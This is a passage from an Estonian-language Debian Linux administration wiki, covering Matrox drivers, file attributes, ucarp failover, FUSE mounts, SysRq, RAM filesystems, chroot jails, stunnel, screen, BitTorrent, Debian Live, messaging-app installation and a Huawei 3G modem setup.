[mtx] MTX driver v1.4.7
[mtx] Allocated a MTX agp driver structure
ACPI: PCI Interrupt 0000:03:00.0[A] -> GSI 21 (level, low) -> IRQ 21
[mtx] 0x2539(sub:0xffffffff) board found at 03:00.0

====Seadistamine====

Komplekt sisaldab ka graafilist haldusutiliiti matroxconfig, mille abil saab genereerida sobiva X serveri seadistusfaili /etc/X11/xorg.conf, nt sellise [[Pilt:Xorg.conf.patch]]

[[Pilt:Matroxconfig-1.gif]]

Käivitamisel öeldakse dmesg'i

[mtx] Registers at 0xe8000000, size: 8K, flags: 131588, knl_addr: 0xf8bb8000
[mtx] Framebuffer at 0xe0000000, size: 128M, flags: 135692, knl_addr: 0x00000000, write-combining: YES
[mtx] Busmastering flags:
[mtx] Board type detected: PCI
[mtx] Chipset 0x2539:0x102b was detected
[mtx] AGP chipset was detected
[mtx] PCI transfers available for read write
[mtx] Parhelia patches applied: PowerM Cap66Mhz CompBypass
[mtx] Registers at 0xe8000000, size: 8K, flags: 131588, knl_addr: 0xf8bb8000
[mtx] Framebuffer at 0xe0000000, size: 128M, flags: 135692, knl_addr: 0x00000000, write-combining: YES
[mtx] Busmastering flags:
[mtx] Board type detected: PCI
[mtx] Chipset 0x2539:0x102b was detected
[mtx] AGP chipset was detected
[mtx] PCI transfers available for read write
[mtx] Parhelia patches applied: PowerM Cap66Mhz CompBypass

X log võiks olla nt selline http://kuutorvaja.eenet.ee/mw-1.9.3/images/e/e1/Xorg.mtx-p690.patch

Kui töökohaarvuti vahetada säilitades videokaardi ja monitorid, siis tõenäoliselt piisab xorg.conf failis asendada seadme sektsioonides PCI BusID väärtus sobivaga

Section "Device"
# generated by mtx wizard
Identifier "mtxwizard_device_1"
Driver "mtx"
BusID "PCI:3:0:0"
Screen 1
EndSection

kusjuures õige saab teha kindlaks lspci utiliidiga

# lspci | grep Matrox
03:00.0 VGA compatible controller: Matrox Graphics, Inc. Millennium P690 (rev 01)

===lsattr ja chattr programmide kasutamine===

chattr programmi abil saab ext2 ja ext3 failisüsteemis seadistada failidele täiendavad omadusi. Näiteks, märkida faili immutable'ks

# chattr +i failinimi

Tulemusena ei saa seda faili ka kustutada juurkasutaja

# rm failinimi
rm: cannot remove `failinimi': Operation not permitted

Atribuutide väärtusi saab küsida öeldes

# lsattr failinimi
----i-------------- failinimi

immutable biti saab eemaldada öeldes

# chattr -i failinimi

===ucarp kasutamine===

ucarp http://www.ucarp.org/project/ucarp tarkvara abil on võimalik korraldada kahe või enama arvuti nn aktiivset/passiiveset klustrit kasutades CARP protokolli. Klustri igal arvutil on oma individuaalne ip aadress ning lisaks on määratud üks teenuse virtuaalne ip aadress. Sõltuvalt sellest, kuidas parasjagu on klustri osalesid masteri osas kokku leppinud pakub master teenust, teised on nö kõrval-seisvas (ingl. k. standby) asendis.

Tarkvara paigaldamiseks tuleb öelda

# apt-get install ucarp

Ning seadistamiseks tuleb nt kahe komponendilise klustri ühe arvuti võrguliideste seadistusfailis /etc/network/interfaces kasutada

auto eth0
iface eth0 inet static
address 192.168.10.51
gateway 192.168.10.254
netmask 255.255.255.0

ucarp-vid 3
ucarp-vip 192.168.10.48
ucarp-password test1234
ucarp-advskew 0
ucarp-advbase 1
ucarp-master yes

iface eth0:ucarp inet static
address 192.168.10.48
netmask 255.255.255.255

ning teise arvuti puhul

auto eth0
iface eth0 inet static
address 192.168.10.52
gateway 192.168.10.254
netmask 255.255.255.0

ucarp-vid 3
ucarp-vip 192.168.10.48
ucarp-password test1234
ucarp-advskew 10
ucarp-advbase 1
ucarp-master yes

iface eth0:ucarp inet static
address 192.168.10.48
netmask 255.255.255.255

Tulemusena on kokkulepitud masteris lisaks tavalistele vürguseadetele seade eth0:ucarp

eth0:ucarp Link encap:Ethernet HWaddr 70:01:68:01:00:51
inet addr:192.168.10.48 Bcast:192.168.10.255 Mask:255.255.255.255
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

ucarp on võrreldes keepalived või heartbeat tarkvaraga tagasihoidlikemate omadustega, kuid mõnel juhul võib just see ollagi eeliseks.

===FUSE===

Kui tavaliselt toimub failisüsteemidega tegelemine, nt külgeühendamine, privilegeeritud kasujana ning nn kernel-space'is, siis FUSE (Filesystem in Userspace) http://fuse.sourceforge.net/ tehnika võimaldab seda teha tavakasutajana user-space'is. Linuxi tuum sisaldab FUSE tuge ning paketihalduses on rohkesti FUSE funktsionaalsust kasutavat tarkvara. Üldkasutatavad FUSE utiliidid on paketis fuse-utils.

====curlftpfs====

curlftpfs abil saab nö külge monteerida ftp serverist ressurssi, tarkvara paigaldamiseks tuleb öelda

# apt-get install curlftpfs

Kasutmise peab kasutaja kuuluma gruppi fuse, ressursi külgeühendamine toimub öeldes

$ curlftpfs ftp://ftp.ee.debian.ee /tmp/ftp.ee.debian.org

ja lahtiühendamiseks

$ fusermount -u /tmp/ftp.ee.debian.org

Kasutamine toimub nii nagu tavalise kohaliku failisüsteemi kasutamine.

====SSHFS====

sshfs abil saab nö külge monteerida serverist, kuhu on ssh ligipääs, ressurssi, tarkvara paigaldamiseks tuleb öelda

# apt-get install sshfs

Kasutamise peab kuuluma gruppi fuse, külgeühendamiseks sobib öelda

$ sshfs mart@loomaaed.tartu.ee:/katalooginimi-ssh-serveris /katalooginimi-kohalikus-arvutis

Lahtiühendamiseks

$ fusermount -u /katalooginimi-kohalikus-arvutis

===SysRq===

Kui Linuxi tuum hangub, siis enamikul juhtudel on ta võimeline aru saama talle nö otse saadetud signaalidest. Lenny paketihalduse tuumaga saab vaikimisi SysRq'd kasutada, väljalülitamiseks tuleb parameetrile kernel.sysrq omistada väärtus null

# sysctl -w kernel.sysrq=0

* http://en.wikipedia.org/wiki/Magic_SysRq_key

====Füüsiliselt konsoolilt====

Füüsiliselt konsoolilt saab sisestada erinevaid kombinatsioone (kui SysRq klahv pole tähistatud, siis tavaliselt toimib sellena PrintScreen)

# failisüsteemide sünkroniseerimine - Alt-SysRq-s
# failisüsteemide read-only remountimine - Alt-SysRq-u
# arvuti reboot - Alt-SysRq-b

Iga tegevuse kohta antakse terminalile ka vastav teade.

====Käsurealt====

Kui aga arvutis ollakse eemal ning mingil põhjusel on siiski võimalik talle käske anda, kuigi ta käitub piisavalt juhtimatult, et selleks ettenähtud vahenditega rebooti teha, nt 'shutdown -r now', siis saab samasid tegevusi esile kutsuda selliselt

bash# echo s > /proc/sysrq-trigger
bash# echo u > /proc/sysrq-trigger
bash# echo b > /proc/sysrq-trigger

Ammendav loetelu võimalikest sisenditest on kirjas tuuma lähtetekstide kataloogis vist failis Documentation/kernel-parameters.txt.

====Xen konsoolilt====

Xeni konsoolilt saab saata SysRq signaale valides

Ctrl+O ja täht

h väljastab nimekirja toetatud signaalidest

SysRq : HELP : loglevel0-8 reBoot tErm Full kIll saK aLlcpus\
showMem Nice powerOff showPc show-all-timers(Q) unRaw Sync showTasks \
Unmount shoW-blocked-tasks

====Serial konsoolilt====

Serial konsoolilt saab tuumale SysRq signaali saata valides Break + täht.

===RAM failisüsteemid===

RAM failisüsteem võimaldab kasutada arvuti virtuaalmälu st RAM + swap ressursse failisüsteemina, nt sellised tehnikad

* tmpfs - tundub, et 2016 aasta seisuga on see üldiselt soovitatav ram failisüsteem, mõnes kohas kirjandus väidab, et tmpfs ei võimalda failisüsteemi suurust piirata, paistab, et see siiski ei ole nii
* ramfs - legacy ramfs, 2016 aasta seisuga üldiselt ei soovitata kasutada

====tmpfs====

tmpfs võimaldab kasutada arvuti virtuaalmälu st RAM + swap ressursse failisüsteemina. Kasutamine toimub selliselt

# mkdir /mnt/tmpfs
# mount -t tmpfs -o size=48g tmpfs /mnt/tmpfs

Kuna failisüsteem asub mälus, siis ta töötab kiiresti

# dd if=/dev/zero of=/mnt/tmpfs/1G bs=1M count=1024
1024+0 records in
1024+0 records out
1073741824 bytes (1.1 GB) copied, 0.981817 s, 1.1 GB/s

Traditsiooniline tmpfs ühenduspunkt tmpfs jaoks on /dev/shm mis on ka vaikimisi Debian Lenny puhul kasutuses

# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/system-root 4.0G 3.6G 236M 94% /
tmpfs 3.9G 0 3.9G 0% /lib/init/rw
udev 10M 60K 10M 1% /dev
tmpfs 3.9G 4.0K 3.9G 1% /dev/shm
/dev/sda1 107M 82M 20M 81% /boot

Süsteemi poolt vaikimisi kasutatavate tmpfs failisüsteemides on nt selline sisu

# find /dev/shm -ls
5812 0 drwxrwxrwt 3 root root 60 Jul 19 08:25 /dev/shm/
5964 0 drwxr-xr-x 2 root root 60 Jul 19 08:25 /dev/shm/network
6019 4 -rw-r--r-- 1 root root 16 Jul 19 08:25 /dev/shm/network/ifstate

ja

# find /lib/init/rw
/lib/init/rw
/lib/init/rw/sendsigs.omit.d
/lib/init/rw/sendsigs.omit.d/portmap
/lib/init/rw/.ramfs

Lisaks on /dev failisüsteem udev kasutamisel tmpfs peal, üldiselt sobib konkreetse süsteemi puhul küsida

# mount | grep tmpfs

====ramfs====

# mkdir /mnt/ramfs
# mount -t ramfs -o size=200m ramfs /mnt/ramfs

====Kasulikud lisamaterjalid====

* https://www.jamescoyle.net/knowledge/951-the-difference-between-a-tmpfs-and-ramfs-ram-disk

===makejail abil chroot keskkonna moodustamine===

Makejail programm abil saab moodustada chroot keskkonda, paigaldamiseks sobib öelda

# apt-get install makejail

Programmi tööd juhib seadistusfail, nt /root/makejail-bash.py, kus on antud juhul näidatud

* kuhu kataloogi moodustada chroot keskkond
* lisada sinna /bin/bash shell ning vastavad teegid lisada (antud juhul kasutatakse AMD64 platvormi)

# cat /root/makejail-bash.py
chroot="/home/mart"
forceCopy=["/lib64/ld-linux-x86-64.so.2", "/bin/bash","/lib/ld-linux-x86-64.so.2"]

moodustame kataloogi /home/mart

bash# mkdir /home/mart

ning moodustame sinna alla chroot keskkonna

bash# makejail /root/makejail-bash.py
Loading configuration file /root/makejail.py
Defining chroot = '/home/mart'
Defining forceCopy = ['/bin/bash']
Chroot directory is /home/mart
Initializing list of running processes
Executing : ps -e
Creating temp dir /tmp/makejail_logs
Adding files matching '/bin/bash'
Checking path '/bin/bash'
Dir '/home/mart/bin' missing
Checking path '/bin'
Making dir /home/mart/bin
..
Creating 'lib/libncurses.so.5' as a symlink to 'libncurses.so.5.5' (pwd=/home/mart/lib)
Executing : file /lib/libncurses.so.5
Sleeping for 2.00 seconds

Tulemusena tekib selline failistruktuur

bash# cd /home
bash# find mart -ls
507962 4 drwxr-xr-x 4 root root 4096 Sep 9 15:12 mart
507963 4 drwxr-xr-x 2 root root 4096 Sep 9 15:12 mart/lib
507968 1260 -rwxr-xr-x 1 root root 1286104 May 15 13:19 mart/lib/libc-2.3.6.so
507972 0 lrwxrwxrwx 1 root root 17 Sep 9 15:12 mart/lib/libncurses.so.5 -> libncurses.so.5.5
507973 100 -rwxr-xr-x 1 root root 97928 May 15 13:19 mart/lib/ld-2.3.6.so
507967 368 -rw-r--r-- 1 root root 369728 Oct 19 2006 mart/lib/libncurses.so.5.5
507974 0 lrwxrwxrwx 1 root root 11 Sep 9 15:12 mart/lib/ld-linux-x86-64.so.2 -> ld-2.3.6.so
507970 12 -rw-r--r-- 1 root root 10392 May 15 13:19 mart/lib/libdl-2.3.6.so
507971 0 lrwxrwxrwx 1 root root 14 Sep 9 15:12 mart/lib/libdl.so.2 -> libdl-2.3.6.so
507969 0 lrwxrwxrwx 1 root root 13 Sep 9 15:12 mart/lib/libc.so.6 -> libc-2.3.6.so
507964 0 lrwxrwxrwx 1 root root 4 Sep 9 15:12 mart/lib64 -> /lib
507965 4 drwxr-xr-x 2 root root 4096 Sep 9 15:12 mart/bin
507966 756 -rwxr-xr-x 1 root root 769368 Dec 11 2006 mart/bin/bash

Selleks, et veenduda kas kasutaja chroot keskkonna tekitamine õnnestus tuleb öelda, mille vastuseks saab shelli (ja siis öelda exit)

bash# chroot /home/mart
bash#

Nt sobib makejaili kasutada OpenSSH kasutajate chrootimisel.

Seda, kas protsess töötab chroot keskkonnas saab kontrollida nt küsides vastava pid kohta, kuis link on mitte / kataloogile, siis on protsess näidatud kataloogi chroot'itud

# ls -ld /proc/11091/root
lrwxrwxrwx 1 root root 0 Feb 2 22:39 /proc/11091/root -> /home/mart

===Peale crashi Debiani käima-aitamine===

Kui Debiani süsteem on crashinud, nt voolu kadumise tõttu, siis enamasti ext3 failisüsteem korrigeerib ennast ise, aga mõned rakendused on segaduses.

====Skype====

Skype teatab vahel, et 'Another Skype instance may exist', sel puhul ei pruugi aitada lock failide eemaldamine

$ rm .Skype/shared.lck .Skype/martkask/config.lck

aga võib aitada selline järgnevus

* käivitada Skype -dhpath võtmega ja logida korra sisse ning sulgeda programm (Quit), st nii, et protsess skype kaob

$ skype --dbpath=/home/mart/skype-tmp

* selleks, et chat history jms säiliks, kopeerida vana sisuga üle kontole vastava kastaloogi sisu

$ rsync -avH /home/mart/.Skype/martkask/ /home/mart/skype-tmp/martkask
$ mv /home/mart/.Skype /home/mart/.Skype-20090811-mittetootav
$ mv /home/mart/skype-tmp /home/mart/.Skype

* katsuda kasutada Skype'i edasi tavapärasel moel

====Icedove====

Programm ütleb käivitamisel, et '...', aitab kustutada failid

$ rm /home/mart/.mozilla-thunderbird/r4t56nog.default/.parentlock
$ rm /home/mart/.mozilla-thunderbird/r4t56nog.default/lock

ja proovida tavalisel moel edasi kasutada. Kontod jms seadistused peaksid nõnda säilima.

====Iceweasel====

Kui Iceweaseli kataloog .mozilla on ühendatud üle NFS'i siis on peale süsteemi crashi Iceweasel üsna katki. St *\lock\* failide eemaldamine näib mitte aitavat jne, väidetavalt on asi NFS ja Iceweaseli koostöös, tundub, et aitab korra .mozilla kataloog kokku ja lahti pakkida

$ tar cf .mozilla.tar .mozilla
$ rm -rf .mozilla
$ tar xf .morilla.tar
$ rm .mozilla.tar

===Stunnel4 kasutamine===

Stunnel http://www.stunnel.org/ tarkvara võimaldab ühendada kokku krüptimist iseenesest mitte toetavat klienti ja krüptitud teenust, või vastupidi. Või korraldada krüptimist mitte toetava kliendi ja serveri vahel siiski krüptitud andmevahetust.

Paigaldamiseks tuleb öelda

# apt-get install stunnel4

====Stunnel4 kliendi kasutamine krüptitud teenuse poole pöördumisel====

Seadistusfaili /etc/stunnel/stunnel.conf sobib kirjutada

sslVersion = SSLv3
chroot = /var/lib/stunnel4/
setuid = stunnel4
setgid = stunnel4
pid = /stunnel4.pid

socket = l:TCP_NODELAY=1
socket = r:TCP_NODELAY=1

output = /var/log/stunnel4/stunnel.log

client = yes

[smtps]
accept = 127.0.0.1:46525
connect = smtps.loomaaed.tartu.ee:465

tulemusena saab pöörduda smtp kliendiga krüptimata localhost:46525 porti, mida vahendatakse smtps.loomaaed.tartu.ee 465 krüptitud pordiga.

===Terminalihaldusprogrammi Screen kasutamine===

screen tarkvara peab olema paigaldatud kaughallatavasse arvutisse

# apt-get install screen

* screen käivitamiseks logida eemal olevasse arvutisse sisse ja öelda

$ screen

* Ctrl-a, c - tekita uus aken
* Ctrl-a, n - liigu järgmisse aknasse
* Ctrl-a, d - lase screenist lahti
* esita nimekiri arvutis olevatest kasutaja screenidest

$ screen -ls
There is a screen on:
2807.pts-5.pg2a (Detached)
1 Socket in /var/run/screen/S-postgres.

* ühendu näidatud screeniga

$ screen -r 2807.pts-5.pg2a

Süsteemis töötavate screenidele vastavaid protsesse näeb öeldes

# ps aux | grep SCREEN

Mitmekasutajarežiimis screen kasutamiseks saavad järgmised kasutajad ühenduda külge öeldes

$ screen -x

Screen logimiseks on -L võti, logi kirjutatakse faili screenlogN.log, või ^a-H.

Kui screen on attached olekus, aga vastav terminaliaken on nö kadunud, siis resumemiseks tuleb enne force'ida detach

$ screen -D

===IEEE 802.1X kasutamine===

TODO

* http://en.wikipedia.org/wiki/IEEE_802.1X
* http://www.cesnet.cz/doc/techzpravy/2007/802.1x-wired-authentication/

===Bittorrent===

Bittorrent on levinud P2P (peer-to-peer, ingl. k. osaliselt-osalisele) andmevahetusprotokoll, millele on iseloomulik, et suhtlemine leiab olulises osas aset otse osaliste endi vahel. Andmevahetusprotokoll on orienteeritud pigem suuremamahulisema andmevahetuse jaoks ning kopeeritud andmeid reeglina ei saa kasutada nö reaalajas kopeerimise käigus, vaid peale kopeerimise lõppu sobiva rakendusega. Nt kui tegu on video-materjaliga, siis saab seda videot asuda vaatama peale kopeerimise lõppu, mitte aga kopeerimise ajal.

====Bittorrenti kliendi kasutamine andmete kopeerimiseks====

Andmete kopeerimiseks võrgust kohalikku arvutisse on vaja teada huvipakkuva ressursi nö aadressi, mis esineb .torrent faili kujul. Nt jagatakse aadressilt http://www.debian.org/CD/torrent-cd/ edasi liikudes Debian operatsioonisüsteemi .torrent faile

http://cdimage.debian.org/debian-cd/5.0.3/amd64/bt-cd/debian-503-amd64-CD-1.iso.torrent

Debian Linux sisaldab mitmeid bittorrent kliente (nt rtorrent, qbittorrent, bittorrent, bittornado jt), mis võivad erineda kõigi või mõne aspekti poolest järgnevatest

* millises mahus on bittorrent protokoll toetatud
* kas programmil on graafiline, pseudo-graafiline (nn curses) või käsurea kasutajaliides

Konkreetselt qbittorrent kasutajaliides näeb välja nt selline

[[Pilt:bittorrent-1.gif]]

kust on näha

* kopeeritakse faili debian-503-amd64-CD-1.iso
* DL Speed on allalaadimise kiirus ja UP Speed üleslaadimise kiirus
* Seeds/Leechs näitab kui paljudelt osalistelt kasutaja kopeerib ja kui paljud temalt edasi kopeerivad
* sakil Search saab vaikimisi qbittorrenti klienti seadistatud trackereid kasutada otsinguks ja otsingu tulemustena leitud .torrenteid kopeerida

Kopeerimise alustamiseks tuleb valida nupp BT ning kopeerida sinna .torrent faili aadress, nt

http://cdimage.debian.org/debian-cd/5.0.3/amd64/bt-cd/debian-503-amd64-CD-1.iso.torrent

====Bittorrent kliendi kasutamine andmete jagamiseks====

Bittorrentiga on algajal kasutajal oluliselt lihtsam kopeerida andmeid endale kui pakkuda välja oma andmeid teistele kasutajatele.

.torrenti moodustamiseks sobib öelda (programmid on paketist bittorrent) eeldusel, et on olemas fail andmed.iso

$ btmakemetafile.bittorrent andmed.iso http://torrent.loomaaed.tartu.ee:80/announce

kus

* andmed.iso - lähtematerjal, mida asutakse välja jagama
* http://torrent.loomaaed.tartu.ee:80/announce - trackeri aadress

Käsu tulemusena moodustatakse vastav .torrent fail

andmed.iso.torrent

ning seejärel saab seda välja jagada nt nii

$ btdownloadcurses.bittorrent andmed.iso.torrent

====Kohaliku trackeri kasutamine====

bittorrent pakett sisaldab bittorrent tracker programmi bttrack. Trackeri käivitamiseks sobib öelda lihtsamal juhul

# bttrack --dfile dfail.log

mille tulemusena käivitub pordil 80 spetsiaalne http server, mis on valmis võtma vastu bittorrent klientide poolt infot andmete väljajagamise kohta ja teenindama bittorrenti kliente, kes soovivad andmeid endale kopeerida.

Selliselt käivitatud trackerit saab kasutada nt organisatsiooni siseselt, iseasi kas sellisel kasutusel erilist praktilist väärtust on.

====Transmission====

Transmission tarkvaral on mitmed kasutajaliidesed, muu hulgas käsurealt kasutamise võimalus. Tarkvara paigaldamiseks sobib öelda

# apt-get install transmission-cli

Seejärel tuleb tekitada seadistusfail nt sellise sisuga ning moodustada näidatud kataloogid

$ cat ~/.config/transmission/settings.json
{
"download-dir": "/home/priit/transm",
"incomplete-dir": "/home/priit/transm-incomplete",
"incomplete-dir-enabled": true,
"open-dialog-dir": "/home/priit",
"recent-download-dir-1": "/home/priit/transm",
}

kusjuures esimesel käivitamisel kirjutab sinna programm paljude muude seadistusparameetrite vaikeväärtused lisaks juurde. Käivitamiseks sobib öelda nt

$ /usr/bin/transmission-cli /tmp/proxmox-ve_3.1-93bf03d4-8.iso.torrent

Tulemusena tekib fail

transm/proxmox-ve_3.1-93bf03d4-8.iso

===Amule===

TODO

===Debian Live===

Debian Live projekt http://debian-live.alioth.debian.org/ tegeleb selliste vahendite ettevalmistamisega, millega kasutaja saab moodustada oma vajaduste rahuldamiseks sobivaid operatsioonisüsteemi tõmmiseid. Live keskkonnale on iseloomulik, et operatsioonisüsteem laaditakse mingilt nö mitte-kõvakettalt, vaid nt CD/DVD plaadilt, USB pulgalt või võrgust ning et sellise keskkonna kasutamine ei mõjuta arvuti lokaalse kõvaketta olekut.

====live-helper====

Tarkvara paigaldamiseks sobib öelda

# apt-get install live-helper

Tarkvara kasutamist on kirjeldatud aadressil http://live.debian.net/manual/html/index.html.

Nt alglaadiva usb pulga tõmmise ettevalmistamiseks sobib kasutada

# mkdir /usr/src/live
# cd /usr/src/live
# ld_config
# ld_build -b usb-hdd

Tulemusena tekib fail binary.img mida saab kopeerida nt Windows Vista keskkonnas USB pulgale programmiga http://www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/.

Tulemuse katsetamiseks sobib qemu, sedasi

# qemu -hda binary.img

====live-magic====

Tarkvara paigaldamiseks sobib öelda

# apt-get install live-magic

Debian Live Magic programmi käivitamiseks tuleb öelda juurkasutajana

# live-magic

ning avaneb järgnev pilt

[[Pilt:Debian-live-1.gif]]

kus tuleb valida, millist Live keskkonda ettevalmistama asutakse.

===Slack kasutamine===

Slack https://slack.com/ paigaldamiseks sobib kopeerida .deb fail ning öelda

# apt-get install failinimi.deb

Paistab, et tarkvara paigaldamise käigus tekitatakse fail

# cat /mnt/kontdeb9/etc/apt/sources.list.d/slack.list
deb https://packagecloud.io/slacktechnologies/slack/debian/ jessie main

===Signal kasutamine===

Tarkvara kopeerimiseks https://signal.org/download/

<pre>
# cat /etc/apt/sources.list.d/signal-xenial.list
deb [arch=amd64] https://updates.signal.org/desktop/apt xenial main

# curl -s https://updates.signal.org/desktop/apt/keys.asc | sudo apt-key add -
</pre>

ja paigaldamiseks

<pre>
# apt-get update
# apt-get install signal-desktop
</pre>

===Skype kasutamine===

Aadressil http://www.skype.com/ jagatakse Skype tarkvara mitmel erineval kujul

* 32 bit
* 64 bit
* staatiliselt lingitud

====2017 - Skype v. 5.0 kasutamine====

Märkus: 2017 kevadel on v. 5.0 beta, mis praktiliselt tähendab, et muidu töötab, aga chat histori otsingut pole.

Lisada võti

# curl https://repo.skype.com/data/SKYPE-GPG-KEY | sudo apt-key add -

lisada fail /etc/apt/sources.list.d/skypeforlinux.list

# cat /etc/apt/sources.list.d/skypeforlinux.list
deb [arch=amd64] https://repo.skype.com/deb stable main

ja paigaldada

# apt-get update
# apt-get install skypeforlinux

Kasulikud lisamaterjalid

* https://www.ubuntuupdates.org/ppa/skypeforlinux

====pre 2017 - Skype kasutamine 64 bit keskkonnas====

Süsteemi etteavalmistamisel tuleb paigaldada paketid ia32-libs-gtk ja libqt4-dev

# apt-get install ia32-libs-gtk libqt4-dev

Seejärel skype 64 bit pakett, muus osas peaks töötama kuigi käivitamisel öeldakse

$ skype
Gtk-Message: Failed to load module "canberra-gtk-module": \
/usr/lib/gtk-2.0/modules/libcanberra-gtk-module.so: wrong ELF class: ELFCLASS64
(<unknown>:6901): Gtk-WARNING **: /usr/lib/gtk-2.0/2.10.0/engines/libglide.so:
wrong ELF class: ELFCLASS64

====Skype kasutamine Debian Wheezy multiarch keskkonnas====

* kopeerida Skype lokaalsesse reposse - http://www.auul.pri.ee/wiki/Operatsioonis%C3%BCsteemi_Debian_GNU/Linux_paketihalduse_kasutamine#Privaatse_failis.C3.BCsteemi_repositooriumi_kasutamine
* lisada süsteemile i386 arhitektuur - http://www.auul.pri.ee/wiki/Operatsioonis%C3%BCsteemi_Debian_GNU/Linux_kasutamine#Multiarch_kasutamine
* paigaldada skype

# apt-get install skype:i386

====Skype v. 8.x kasutamine====

Kui järgmine v. 8.y versioon ei sobi, siis saab eelmise x. 8.x paigaldada nt selliselt

# apt-get install skypeforlinux=8.11.0.4

Nimekiri variantidest on näha aadressil https://repo.skype.com/deb/pool/main/s/skypeforlinux/

====Skyperious====

Head inimesed on programmeerinud Python keeles tarkvara Skyperious http://suurjaak.github.io/Skyperious/index.html, mille abil saab Skype andmebaaside sisu, st praktiliselt jutuajamist ajalugu, uurida ilma Skype programmi enda, võrguühenduse jms olemasoluta. Tundub, et programm kasutab asjaolu, et vastav andmebaas on praktiliselt SQLite andmebaas. Praktiliselt võib see olla abiks kui Skype versiooni uuendamisel ei õnnestu chat history sisu uude versiooni kaasa võtta, nt v. 4.2 -> 4.3 uuendamisel Linux all. Skyperiuos kasutajaliides paistab selline

[[Pilt:Skyperious-1.gif]]

Tarkvara paigaldamist kirjeldatakse aadressil https://github.com/suurjaak/Skyperious. Lühidalt tuleb Debian Jessie all öelda

# apt-get install wx2.8-i18n libwxgtk2.8-dev libgtk2.0-dev
# apt-get install python-wxgtk2.8 python-wxtools
# apt-get install python-pip

Seejärel lähtetekst lahti pakkida ja öelda

# pip install --allow-all-external --allow-unverified -r requirements

Kasutajana käivitamisel öeldakse alustuseks

$ skyperious.sh
-su: skyperious.sh: /bin/sh^M: bad interpreter: No such file or directory

millest saab üle nn dos reavahetuste eemaldamisega

# fromdos skyperious.sh

====Misc====

Skype vestlusaknas saab teksti parandada nn Sed süntaksit kasutades

mart: priiti, ei ole võimalik

,-------------------------------,
| s/priiti/Priit/ |
|_______________________________|

http://share.skype.com/sites/linux/2009/09/some_explanations.html

===PulseAudio kasutamine===

http://pulseaudio.org/

===Huawei netipulga kasutamine===

2010 aastal on populaarne kasutada mobiilse internetiühenduse teenust Huawei USB netipulga abil. Sellist tüüpi netipulgad on sisuliselt GSM modemid, mis ühendatakse arvutiga USB kaudu ning mille kasutamiseks peab seadmesse olema paigaldatud mobiilside operaatori kehtiv SIM-kaart (Subscriber Identity Module). Selline netipulk ei ole kuidagi seotud wifiga ning seda saab kasutada asudes mobiilside operaatori levialas. Netipulga kasutamiseks peab olema arvutisse paigaldatud PPP kliendi tarkvara, nt wvdial ja arvuti oskama kasutada USB-serial seadmeid.

Kasulikud lisamaterjalid

* http://wiki.debian.org/Modem/3G

====Riistvara====

Näiteks olgu kasutada Huawei E620 USB Modem seade ning teenusepakkuja EMT andmesideteenus.

# lsusb
...
Bus 002 Device 003: ID 12d1:1001 Huawei Technologies Co., Ltd. E620 USB Modem

====Tarkvara====

Netipulga kasutamiseks piisab Debian Lenny paketihalduse tarkvarast, st vajalikest tuuma moodulitest ning wvdial programmist, mille paigaldamiseks sobib öelda

# apt-get install wvdial

====Seadistamine ja käivitamine====

Esmalt tuleb laadida maha usb-storage, option ja usbserial tuuma moodulid

# rmmmod usb-storage
# rmmod option
# rmmod usbserial

ning laadida usbserial sobivate parameetritega, vastavalt käesolevale lsusb väljundile, nt

# modprobe usbserial vendor=0x12d1 product=0x1001

Tulemusena on kasutada USB-serial seadmed

# ls -l /dev/ttyUSB*
crw-rw---- 1 root dialout 188, 0 Apr 27 23:46 /dev/ttyUSB0
crw-rw---- 1 root dialout 188, 1 Apr 27 23:15 /dev/ttyUSB1
crw-rw---- 1 root dialout 188, 2 Apr 27 23:15 /dev/ttyUSB2
crw-rw---- 1 root dialout 188, 3 Apr 27 23:15 /dev/ttyUSB3

wvdial tarkvara tööd juhib seadistusfail /etc/wvdial.conf

# cat /etc/wvdial.conf
[Dialer Defaults]
Phone = *99***1#
Username = username
Password = password
Stupid Mode = 1
Dial Command = ATDT

[Dialer hsdpa]
Modem = /dev/ttyUSB0
Baud = 460800
Init2 = ATZ
Init3 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
ISDN = 0
Modem Type = Analog Modem

kus

* Phone - väärtus sõltub teenusepakkujast

Käivitamiseks sobib öelda juurkasutajana

# wvdial hsdpa
--> WvDial: Internet dialer version 1.60
--> Cannot get information for serial port.
--> Initializing modem.
--> Sending: ATZ
ATZ
OK
--> Sending: ATZ
ATZ
OK
--> Sending: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
OK
--> Modem initialized.
--> Sending: ATDT*99***1#
--> Waiting for carrier.
ATDT*99***1#
CONNECT
--> Carrier detected. Starting PPP immediately.
--> Starting pppd at Tue Apr 27 23:41:55 2010
--> Pid of pppd: 7879
--> Using interface ppp0
--> pppd: @« @« x«
--> pppd: @« @« x«
--> pppd: @« @« x«
--> pppd: @« @« x«
--> pppd: @« @« x«
--> pppd: @« @« x«
--> pppd: @« @« x«
--> local IP address 192.168.3.91
--> pppd: @« @« x«
--> remote IP address 10.64.64.64
--> pppd: @« @« x«
--> primary DNS address 192.168.32.116
--> pppd: @« @« x«
--> secondary DNS address 192.168.32.115
--> pppd: @« @« x«

Tulemusena tekib süsteemi juurde PPP seade, nt

# ifconfig ppp0
ppp0 Link encap:Point-to-Point Protocol
inet addr:192.168.3.91 P-t-P:10.64.64.64 Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1
RX packets:7 errors:3 dropped:0 overruns:0 frame:0
TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:3
RX bytes:118 (118.0 B) TX bytes:157 (157.0 B)

====Netipulga kasutamine====

Peale PPP lingi tekkimist piisab liiklus ruutida üle selle lingi ning saab kasutada võrku, nt

# route add -net 172.23.0.0 netmask 255.255.0.0 gw 192.168.3.91

Lisaks nö sihipärasele mobiilsele töökohale andmeside tekitamisele on võimalikud nt sellised kasutusalad

* ühendada võrku arvuteid, mida muul viisil võib olla tülikas ühendada
* ühendada arvutile külge alternatiivne andmesidekanal (nt monitooringuarvutist teadete saatmiseks)

Kasutamisel tuleb arvestada, et läbi lisandunud seadme on võimalik lisaks välja pöördumisele ka sisse pöörduda, seepärast tasub kaaluda seoses netipulgaga paketifiltri kasutamist.

===ffmpeg kasutamine===

ffmpeg tarkvara abil saab ekraanil toimuvat nö videona salvestada

